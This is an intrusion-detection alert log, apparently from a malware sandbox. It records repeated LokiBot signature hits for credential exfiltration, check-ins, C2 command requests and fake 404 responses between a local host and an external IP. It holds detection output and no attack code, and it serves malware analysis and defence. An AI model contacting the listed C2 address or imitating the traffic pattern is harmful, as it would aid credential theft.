2025-02-20T15:06:30.962592+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.6	49710	104.21.80.1	80	TCP
2025-02-20T15:06:32.114666+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49711	104.21.80.1	80	TCP
2025-02-20T15:06:32.114666+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49711	104.21.80.1	80	TCP
2025-02-20T15:06:32.114666+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49711	104.21.80.1	80	TCP
2025-02-20T15:06:32.871847+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.6	49711	104.21.80.1	80	TCP
2025-02-20T15:06:32.976601+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49712	104.21.80.1	80	TCP
2025-02-20T15:06:32.976601+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49712	104.21.80.1	80	TCP
2025-02-20T15:06:32.976601+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49712	104.21.80.1	80	TCP
2025-02-20T15:06:33.745179+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49712	104.21.80.1	80	TCP
2025-02-20T15:06:33.750253+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49712	TCP
2025-02-20T15:06:34.912048+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49719	104.21.80.1	80	TCP
2025-02-20T15:06:34.912048+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49719	104.21.80.1	80	TCP
2025-02-20T15:06:34.912048+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49719	104.21.80.1	80	TCP
2025-02-20T15:06:35.752990+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49719	104.21.80.1	80	TCP
2025-02-20T15:06:35.758107+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49719	TCP
2025-02-20T15:06:37.017142+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49730	104.21.80.1	80	TCP
2025-02-20T15:06:37.017142+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49730	104.21.80.1	80	TCP
2025-02-20T15:06:37.017142+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49730	104.21.80.1	80	TCP
2025-02-20T15:06:37.735651+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49730	104.21.80.1	80	TCP
2025-02-20T15:06:37.740651+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49730	TCP
2025-02-20T15:06:38.915989+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49747	104.21.80.1	80	TCP
2025-02-20T15:06:38.915989+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49747	104.21.80.1	80	TCP
2025-02-20T15:06:38.915989+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49747	104.21.80.1	80	TCP
2025-02-20T15:06:39.690280+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49747	104.21.80.1	80	TCP
2025-02-20T15:06:40.848385+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49758	104.21.80.1	80	TCP
2025-02-20T15:06:40.848385+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49758	104.21.80.1	80	TCP
2025-02-20T15:06:40.848385+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49758	104.21.80.1	80	TCP
2025-02-20T15:06:41.668278+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49758	104.21.80.1	80	TCP
2025-02-20T15:06:41.757122+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49758	TCP
2025-02-20T15:06:43.038217+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49774	104.21.80.1	80	TCP
2025-02-20T15:06:43.038217+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49774	104.21.80.1	80	TCP
2025-02-20T15:06:43.038217+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49774	104.21.80.1	80	TCP
2025-02-20T15:06:43.754362+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49774	104.21.80.1	80	TCP
2025-02-20T15:06:44.922529+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49789	104.21.80.1	80	TCP
2025-02-20T15:06:44.922529+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49789	104.21.80.1	80	TCP
2025-02-20T15:06:44.922529+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49789	104.21.80.1	80	TCP
2025-02-20T15:06:45.774988+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49789	104.21.80.1	80	TCP
2025-02-20T15:06:45.780149+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49789	TCP
2025-02-20T15:06:47.032685+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49806	104.21.80.1	80	TCP
2025-02-20T15:06:47.032685+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49806	104.21.80.1	80	TCP
2025-02-20T15:06:47.032685+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49806	104.21.80.1	80	TCP
2025-02-20T15:06:47.888815+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49806	104.21.80.1	80	TCP
2025-02-20T15:06:47.894768+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49806	TCP
2025-02-20T15:06:49.052569+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49820	104.21.80.1	80	TCP
2025-02-20T15:06:49.052569+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49820	104.21.80.1	80	TCP
2025-02-20T15:06:49.052569+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49820	104.21.80.1	80	TCP
2025-02-20T15:06:49.874210+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49820	104.21.80.1	80	TCP
2025-02-20T15:06:49.879296+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49820	TCP
2025-02-20T15:06:51.051090+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49834	104.21.80.1	80	TCP
2025-02-20T15:06:51.051090+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49834	104.21.80.1	80	TCP
2025-02-20T15:06:51.051090+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49834	104.21.80.1	80	TCP
2025-02-20T15:06:51.783915+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49834	104.21.80.1	80	TCP
2025-02-20T15:06:52.946796+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49847	104.21.80.1	80	TCP
2025-02-20T15:06:52.946796+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49847	104.21.80.1	80	TCP
2025-02-20T15:06:52.946796+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49847	104.21.80.1	80	TCP
2025-02-20T15:06:53.857548+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49847	104.21.80.1	80	TCP
2025-02-20T15:06:53.862664+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49847	TCP
2025-02-20T15:06:55.022125+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49859	104.21.80.1	80	TCP
2025-02-20T15:06:55.022125+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49859	104.21.80.1	80	TCP
2025-02-20T15:06:55.022125+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49859	104.21.80.1	80	TCP
2025-02-20T15:06:55.803929+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49859	104.21.80.1	80	TCP
2025-02-20T15:06:55.844992+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49859	TCP
2025-02-20T15:06:57.236548+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49872	104.21.80.1	80	TCP
2025-02-20T15:06:57.236548+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49872	104.21.80.1	80	TCP
2025-02-20T15:06:57.236548+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49872	104.21.80.1	80	TCP
2025-02-20T15:06:58.022033+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49872	104.21.80.1	80	TCP
2025-02-20T15:06:58.027100+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49872	TCP
2025-02-20T15:06:59.191949+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49884	104.21.80.1	80	TCP
2025-02-20T15:06:59.191949+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49884	104.21.80.1	80	TCP
2025-02-20T15:06:59.191949+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49884	104.21.80.1	80	TCP
2025-02-20T15:06:59.869131+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49884	104.21.80.1	80	TCP
2025-02-20T15:06:59.874420+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49884	TCP
2025-02-20T15:07:01.021173+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49897	104.21.80.1	80	TCP
2025-02-20T15:07:01.021173+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49897	104.21.80.1	80	TCP
2025-02-20T15:07:01.021173+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49897	104.21.80.1	80	TCP
2025-02-20T15:07:02.752348+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49897	104.21.80.1	80	TCP
2025-02-20T15:07:02.756796+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49897	TCP
2025-02-20T15:07:03.956144+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49912	104.21.80.1	80	TCP
2025-02-20T15:07:03.956144+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49912	104.21.80.1	80	TCP
2025-02-20T15:07:03.956144+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49912	104.21.80.1	80	TCP
2025-02-20T15:07:04.715146+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49912	104.21.80.1	80	TCP
2025-02-20T15:07:04.720213+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49912	TCP
2025-02-20T15:07:05.878161+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49923	104.21.80.1	80	TCP
2025-02-20T15:07:05.878161+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49923	104.21.80.1	80	TCP
2025-02-20T15:07:05.878161+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49923	104.21.80.1	80	TCP
2025-02-20T15:07:06.708944+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49923	104.21.80.1	80	TCP
2025-02-20T15:07:06.713979+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49923	TCP
2025-02-20T15:07:07.973258+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49938	104.21.80.1	80	TCP
2025-02-20T15:07:07.973258+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49938	104.21.80.1	80	TCP
2025-02-20T15:07:07.973258+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49938	104.21.80.1	80	TCP
2025-02-20T15:07:08.770999+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49938	104.21.80.1	80	TCP
2025-02-20T15:07:08.776089+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49938	TCP
2025-02-20T15:07:09.964814+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49951	104.21.80.1	80	TCP
2025-02-20T15:07:09.964814+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49951	104.21.80.1	80	TCP
2025-02-20T15:07:09.964814+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49951	104.21.80.1	80	TCP
2025-02-20T15:07:10.625118+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49951	104.21.80.1	80	TCP
2025-02-20T15:07:10.641582+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49951	TCP
2025-02-20T15:07:11.940214+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49961	104.21.80.1	80	TCP
2025-02-20T15:07:11.940214+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49961	104.21.80.1	80	TCP
2025-02-20T15:07:11.940214+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49961	104.21.80.1	80	TCP
2025-02-20T15:07:12.651602+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49961	104.21.80.1	80	TCP
2025-02-20T15:07:12.656657+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49961	TCP
2025-02-20T15:07:13.832444+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49974	104.21.80.1	80	TCP
2025-02-20T15:07:13.832444+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49974	104.21.80.1	80	TCP
2025-02-20T15:07:13.832444+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49974	104.21.80.1	80	TCP
2025-02-20T15:07:14.466573+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49974	104.21.80.1	80	TCP
2025-02-20T15:07:14.471578+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49974	TCP
2025-02-20T15:07:15.638534+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49986	104.21.80.1	80	TCP
2025-02-20T15:07:15.638534+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49986	104.21.80.1	80	TCP
2025-02-20T15:07:15.638534+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49986	104.21.80.1	80	TCP
2025-02-20T15:07:16.371559+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49986	104.21.80.1	80	TCP
2025-02-20T15:07:17.558386+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49998	104.21.80.1	80	TCP
2025-02-20T15:07:17.558386+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49998	104.21.80.1	80	TCP
2025-02-20T15:07:17.558386+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49998	104.21.80.1	80	TCP
2025-02-20T15:07:18.401403+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49998	104.21.80.1	80	TCP
2025-02-20T15:07:18.406522+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	49998	TCP
2025-02-20T15:07:19.553017+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50008	104.21.80.1	80	TCP
2025-02-20T15:07:19.553017+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50008	104.21.80.1	80	TCP
2025-02-20T15:07:19.553017+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50008	104.21.80.1	80	TCP
2025-02-20T15:07:20.290539+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50008	104.21.80.1	80	TCP
2025-02-20T15:07:21.475252+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50010	104.21.80.1	80	TCP
2025-02-20T15:07:21.475252+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50010	104.21.80.1	80	TCP
2025-02-20T15:07:21.475252+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50010	104.21.80.1	80	TCP
2025-02-20T15:07:22.299094+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50010	104.21.80.1	80	TCP
2025-02-20T15:07:22.304230+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50010	TCP
2025-02-20T15:07:23.458173+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50011	104.21.80.1	80	TCP
2025-02-20T15:07:23.458173+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50011	104.21.80.1	80	TCP
2025-02-20T15:07:23.458173+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50011	104.21.80.1	80	TCP
2025-02-20T15:07:24.196182+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50011	104.21.80.1	80	TCP
2025-02-20T15:07:25.367621+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50012	104.21.80.1	80	TCP
2025-02-20T15:07:25.367621+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50012	104.21.80.1	80	TCP
2025-02-20T15:07:25.367621+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50012	104.21.80.1	80	TCP
2025-02-20T15:07:26.167859+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50012	104.21.80.1	80	TCP
2025-02-20T15:07:26.172922+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50012	TCP
2025-02-20T15:07:27.330956+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50013	104.21.80.1	80	TCP
2025-02-20T15:07:27.330956+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50013	104.21.80.1	80	TCP
2025-02-20T15:07:27.330956+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50013	104.21.80.1	80	TCP
2025-02-20T15:07:28.038526+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50013	104.21.80.1	80	TCP
2025-02-20T15:07:28.044405+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50013	TCP
2025-02-20T15:07:29.206393+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50014	104.21.80.1	80	TCP
2025-02-20T15:07:29.206393+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50014	104.21.80.1	80	TCP
2025-02-20T15:07:29.206393+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50014	104.21.80.1	80	TCP
2025-02-20T15:07:29.916993+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50014	104.21.80.1	80	TCP
2025-02-20T15:07:29.929180+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50014	TCP
2025-02-20T15:07:31.094570+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50015	104.21.80.1	80	TCP
2025-02-20T15:07:31.094570+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50015	104.21.80.1	80	TCP
2025-02-20T15:07:31.094570+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50015	104.21.80.1	80	TCP
2025-02-20T15:07:31.846949+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50015	104.21.80.1	80	TCP
2025-02-20T15:07:33.022213+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50017	104.21.80.1	80	TCP
2025-02-20T15:07:33.022213+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50017	104.21.80.1	80	TCP
2025-02-20T15:07:33.022213+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50017	104.21.80.1	80	TCP
2025-02-20T15:07:33.870284+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50017	104.21.80.1	80	TCP
2025-02-20T15:07:33.875320+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50017	TCP
2025-02-20T15:07:35.033842+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50018	104.21.80.1	80	TCP
2025-02-20T15:07:35.033842+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50018	104.21.80.1	80	TCP
2025-02-20T15:07:35.033842+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50018	104.21.80.1	80	TCP
2025-02-20T15:07:35.752737+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50018	104.21.80.1	80	TCP
2025-02-20T15:07:36.945112+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50019	104.21.80.1	80	TCP
2025-02-20T15:07:36.945112+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50019	104.21.80.1	80	TCP
2025-02-20T15:07:36.945112+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50019	104.21.80.1	80	TCP
2025-02-20T15:07:37.735096+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50019	104.21.80.1	80	TCP
2025-02-20T15:07:37.740209+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50019	TCP
2025-02-20T15:07:38.927592+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50020	104.21.80.1	80	TCP
2025-02-20T15:07:38.927592+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50020	104.21.80.1	80	TCP
2025-02-20T15:07:38.927592+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50020	104.21.80.1	80	TCP
2025-02-20T15:07:39.714801+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50020	104.21.80.1	80	TCP
2025-02-20T15:07:39.719826+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50020	TCP
2025-02-20T15:07:40.878181+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50021	104.21.80.1	80	TCP
2025-02-20T15:07:40.878181+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50021	104.21.80.1	80	TCP
2025-02-20T15:07:40.878181+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50021	104.21.80.1	80	TCP
2025-02-20T15:07:41.672229+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50021	104.21.80.1	80	TCP
2025-02-20T15:07:41.679249+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50021	TCP
2025-02-20T15:07:42.845534+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50022	104.21.80.1	80	TCP
2025-02-20T15:07:42.845534+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50022	104.21.80.1	80	TCP
2025-02-20T15:07:42.845534+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50022	104.21.80.1	80	TCP
2025-02-20T15:07:43.653614+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50022	104.21.80.1	80	TCP
2025-02-20T15:07:43.658699+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50022	TCP
2025-02-20T15:07:44.825217+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50023	104.21.80.1	80	TCP
2025-02-20T15:07:44.825217+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50023	104.21.80.1	80	TCP
2025-02-20T15:07:44.825217+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50023	104.21.80.1	80	TCP
2025-02-20T15:07:45.616285+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50023	104.21.80.1	80	TCP
2025-02-20T15:07:45.621485+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50023	TCP
2025-02-20T15:07:47.038071+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50025	104.21.80.1	80	TCP
2025-02-20T15:07:47.038071+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50025	104.21.80.1	80	TCP
2025-02-20T15:07:47.038071+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50025	104.21.80.1	80	TCP
2025-02-20T15:07:47.845405+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50025	104.21.80.1	80	TCP
2025-02-20T15:07:47.850549+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50025	TCP
2025-02-20T15:07:49.004232+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50026	104.21.80.1	80	TCP
2025-02-20T15:07:49.004232+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50026	104.21.80.1	80	TCP
2025-02-20T15:07:49.004232+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50026	104.21.80.1	80	TCP
2025-02-20T15:07:49.785396+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50026	104.21.80.1	80	TCP
2025-02-20T15:07:49.790448+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50026	TCP
2025-02-20T15:07:50.942877+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50027	104.21.80.1	80	TCP
2025-02-20T15:07:50.942877+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50027	104.21.80.1	80	TCP
2025-02-20T15:07:50.942877+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50027	104.21.80.1	80	TCP
2025-02-20T15:07:51.729949+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50027	104.21.80.1	80	TCP
2025-02-20T15:07:51.735062+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50027	TCP
2025-02-20T15:07:52.911840+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50028	104.21.80.1	80	TCP
2025-02-20T15:07:52.911840+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50028	104.21.80.1	80	TCP
2025-02-20T15:07:52.911840+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50028	104.21.80.1	80	TCP
2025-02-20T15:07:53.713076+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50028	104.21.80.1	80	TCP
2025-02-20T15:07:53.718153+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.80.1	80	192.168.2.6	50028	TCP
2025-02-20T15:07:54.881380+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50029	104.21.80.1	80	TCP
2025-02-20T15:07:54.881380+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50029	104.21.80.1	80	TCP
2025-02-20T15:07:54.881380+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50029	104.21.80.1	80	TCP
